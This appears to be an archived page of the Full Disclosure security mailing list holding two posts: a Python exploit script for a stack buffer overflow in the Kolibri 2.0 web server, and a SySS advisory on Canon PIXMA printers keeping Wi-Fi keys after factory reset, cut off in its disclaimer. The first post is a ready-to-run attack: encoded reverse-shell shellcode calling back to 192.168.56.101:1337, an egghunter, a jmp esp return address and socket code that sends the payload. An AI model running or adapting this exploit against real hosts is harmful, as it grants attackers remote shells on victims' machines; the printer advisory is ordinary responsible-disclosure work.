[FD] Kolibri GET request buffer Overflow [Stack Egghunter]

2023-08-03 Thread Mahmoud Noureldin
#!/usr/bin/python3
# Exploit Title: Kolibri GET request buffer Overflow [Stack Egghunter]
# Date: 2 August 2023
# Exploit Author: Mahmoud NourEldin @Engacker
# Vendor App: https://www.exploit-db.com/apps/4d4e15b98e105facf94e4fd6a1f9eb78-Kolibri-2.0-win.zip
# Version: Kolibri 2.0
# Tested on: Windows 10
# Description:
# For the first time making the egghunter jump to the beginning of the stack

import socket, sys

if len(sys.argv) != 3:
    # host and port are the two positional arguments read below
    print(f"[*] Usage: {sys.argv[0]} <host> <port>\n[*] Exploit created by Mahmoud NourEldin\n[*] https://www.linkedin.com/in/tamatahyt")
    sys.exit(0)
host = sys.argv[1]
port = int(sys.argv[2])


try:
    # [BadChars] \x00\x0a\x0d\x20\x3d\x3f
    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.101 LPORT=1337 \
    #   EXITFUNC=thread -f py -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x20\x3d\x3f"
    # Egg tag (w00t twice) followed by the encoded reverse shell
    buf = b"w00tw00t"
    buf += b"\xba\xc7\xe5\x34\xdd\xd9\xe8\xd9\x74\x24\xf4\x58"
    buf += b"\x33\xc9\xb1\x52\x83\xe8\xfc\x31\x50\x0e\x03\x97"
    buf += b"\xeb\xd6\x28\xeb\x1c\x94\xd3\x13\xdd\xf9\x5a\xf6"
    buf += b"\xec\x39\x38\x73\x5e\x8a\x4a\xd1\x53\x61\x1e\xc1"
    buf += b"\xe0\x07\xb7\xe6\x41\xad\xe1\xc9\x52\x9e\xd2\x48"
    buf += b"\xd1\xdd\x06\xaa\xe8\x2d\x5b\xab\x2d\x53\x96\xf9"
    buf += b"\xe6\x1f\x05\xed\x83\x6a\x96\x86\xd8\x7b\x9e\x7b"
    buf += b"\xa8\x7a\x8f\x2a\xa2\x24\x0f\xcd\x67\x5d\x06\xd5"
    buf += b"\x64\x58\xd0\x6e\x5e\x16\xe3\xa6\xae\xd7\x48\x87"
    buf += b"\x1e\x2a\x90\xc0\x99\xd5\xe7\x38\xda\x68\xf0\xff"
    buf += b"\xa0\xb6\x75\x1b\x02\x3c\x2d\xc7\xb2\x91\xa8\x8c"
    buf += b"\xb9\x5e\xbe\xca\xdd\x61\x13\x61\xd9\xea\x92\xa5"
    buf += b"\x6b\xa8\xb0\x61\x37\x6a\xd8\x30\x9d\xdd\xe5\x22"
    buf += b"\x7e\x81\x43\x29\x93\xd6\xf9\x70\xfc\x1b\x30\x8a"
    buf += b"\xfc\x33\x43\xf9\xce\x9c\xff\x95\x62\x54\x26\x62"
    buf += b"\x84\x4f\x9e\xfc\x7b\x70\xdf\xd5\xbf\x24\x8f\x4d"
    buf += b"\x69\x45\x44\x8d\x96\x90\xcb\xdd\x38\x4b\xac\x8d"
    buf += b"\xf8\x3b\x44\xc7\xf6\x64\x74\xe8\xdc\x0c\x1f\x13"
    buf += b"\xb7\xf2\x48\x23\x22\x9b\x8a\x53\xa9\x62\x02\xb5"
    buf += b"\xdb\x84\x42\x6e\x74\x3c\xcf\xe4\xe5\xc1\xc5\x81"
    buf += b"\x26\x49\xea\x76\xe8\xba\x87\x64\x9d\x4a\xd2\xd6"
    buf += b"\x08\x54\xc8\x7e\xd6\xc7\x97\x7e\x91\xfb\x0f\x29"
    buf += b"\xf6\xca\x59\xbf\xea\x75\xf0\xdd\xf6\xe0\x3b\x65"
    buf += b"\x2d\xd1\xc2\x64\xa0\x6d\xe1\x76\x7c\x6d\xad\x22"
    buf += b"\xd0\x38\x7b\x9c\x96\x92\xcd\x76\x41\x48\x84\x1e"
    buf += b"\x14\xa2\x17\x58\x19\xef\xe1\x84\xa8\x46\xb4\xbb"
    buf += b"\x05\x0f\x30\xc4\x7b\xaf\xbf\x1f\x38\xcf\x5d\xb5"
    buf += b"\x35\x78\xf8\x5c\xf4\xe5\xfb\x8b\x3b\x10\x78\x39"
    buf += b"\xc4\xe7\x60\x48\xc1\xac\x26\xa1\xbb\xbd\xc2\xc5"
    buf += b"\x68\xbd\xc6"

    # Egghunter (Windows 10 WOW64 variant) that scans memory for the tag w00t twice
    egghunter = b"\x33\xd2\x66\x81\xca\xff\x0f\x33\xdb\x42\x53\x53\x52\x53\x53\x53"
    egghunter += b"\x6a\x29\x58\xb3\xc0\x64\xff\x13\x83\xc4\x0c\x5a\x83\xc4\x08\x3c"
    egghunter += b"\x05\x74\xdf\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xda\xaf\x75\xd7"
    egghunter += b"\xff\xe7"

    eip = b"\x42\x24\x01\x10"  # 0x10012442 jmp esp
    '''
    payload length is: 800 bytes
    EIP is overwritten at the 516th byte, which makes a jmp to ESP
    ESP points to the egghunter followed by a number of filler bytes
    The egghunter searches for w00tw00t+shellcode, which sits in the first
    part of the request [buf]
    The rest is just padding
    '''
    payload = b"\x90" * (515 - len(buf)) + buf + eip + egghunter + (268 - len(egghunter)) * b"C"

    # The request to the server
    request = b""
    request += b"GET /" + payload + b" HTTP/1.1\r\n"
    request += b"Host: " + host.encode() + b":" + str(port).encode() + b"\r\n\r\n"

    # Connecting to the server
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print("[*] Sending the evil payload...\nSee your reverse shell")
    s.connect((host, port))
    s.sendall(request)
    s.close()
    print("[x] Done")

# if we can't connect
except socket.error:
    print("Could not connect!\n[*] Is the IP correct? Is the port correct? Can you ping the machine?")
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [SYSS-2023-011]: Canon PIXMA TR4550 and other inkjet printer models - Insufficient or Incomplete Data Removal, within Hardware Component (CWE-1301)

2023-08-03 Thread Matthias Deeg via Fulldisclosure

Advisory ID:               SYSS-2023-011
Product:                   PIXMA TR4550
Manufacturer:              Canon
Affected Version(s):       1.020 / 1.080
                           also affects many other Canon inkjet printer
                           models[4]
Tested Version(s):         1.020 / 1.080
Vulnerability Type:        Insufficient or Incomplete Data Removal
                           within Hardware Component (CWE-1301)
                           Insufficiently Protected Credentials
                           (CWE-522)
Risk Level:                Low
Solution Status:           Fixed
Manufacturer Notification: 2023-04-06
Solution Date:             2023-07-31
Public Disclosure:         2023-08-03
CVE Reference:             No CVE ID from Canon PSIRT
Author of Advisory:        Manuel Stotz, SySS GmbH



Overview:

The Canon PIXMA TR4550 is an entry-level 4-in-1 printer equipped with
Wi-Fi connectivity.

The manufacturer describes the product as follows (see [1]):

"Ready to adapt to your smart home office environment, this efficient
4-In-One printer requires minimal space but gives maximum support to
your projects. Whether scanning a document, copying an ID, faxing an
invoice or printing posters, PIXMA TR4550 has the functionality to keep
up with your business needs. Equipped with smart Wi-Fi connectivity to
optimise management of functions and features, this front-loading
4-In-One printer is the compact solution that saves space, streamlines
ink usage and brings productivity to the forefront."

The unprotected storage of credentials and insufficient data removal
during a factory reset allow sensitive data to be read out afterward.



Vulnerability Details:

The Canon PIXMA TR4550 stores sensitive data, such as the SSID and the
Wi-Fi pre-shared key (PSK), unencrypted in its persistent storage
(EEPROM).

Resetting the product to factory settings (via 'Setup', 'Device
settings', 'Reset setting' and 'All data') does not securely delete this
sensitive information.



Proof of Concept (PoC):

SySS could successfully perform a proof-of-concept attack via the
following steps:

* Configure and establish a Wi-Fi connection.
* Reset all data (Setup, Device settings, Reset setting, All data).
* Disassemble the printer and locate the EEPROM on the PCB.
* Create an EEPROM memory dump.
* Search and locate the configured SSID and PSK in the memory dump.



Solution:

Canon PSIRT published its security advisory "Vulnerability
Mitigation/Remediation for Inkjet Printers (Home and Office/Large
Format)" (CP2023-003)[3] describing how sensitive information should be
deleted concerning the affected printers[5].



Disclosure Timeline:

2023-04-06: Vulnerability reported to manufacturer
2023-04-12: Canon PSIRT creates ticket
2023-04-27: Update from Canon concerning ongoing analysis
2023-05-15: Canon confirms security issue
2023-05-23: Agreement on public disclosure date
2023-07-17: Canon PSIRT informs about scheduled publication of their
            security advisory
2023-07-31: Canon PSIRT publishes their security advisory "Vulnerability
            Mitigation/Remediation for Inkjet Printers (Home and
            Office/Large Format)" (CP2023-003)[3]
2023-08-03: Public release of SySS security advisory



References:

[1] Product website for Canon PIXMA TR4550
    https://www.canon-europe.com/support/consumer/products/printers/pixma/tr-series/pixma-tr4550.html
[2] SySS Security Advisory SYSS-2023-011
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-011.txt
[3] CP2023-003 Vulnerability Mitigation/Remediation for Inkjet Printers
    (Home and Office/Large Format)
    https://psirt.canon/advisory-information/cp2023-003/
[4] List of affected printers
    https://canon.a.bigcontent.io/v1/static/affected-models_20230731_d04c0d9895124b65acd21ca68357dcdc
[5] SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Manuel Stotz of SySS GmbH.

E-Mail: manuel.stotz (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Manuel_Stotz.asc
Key Fingerprint: F051 5B74 7E70 193E 7F66 0133 E790 F68A BCE6 8C6D



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest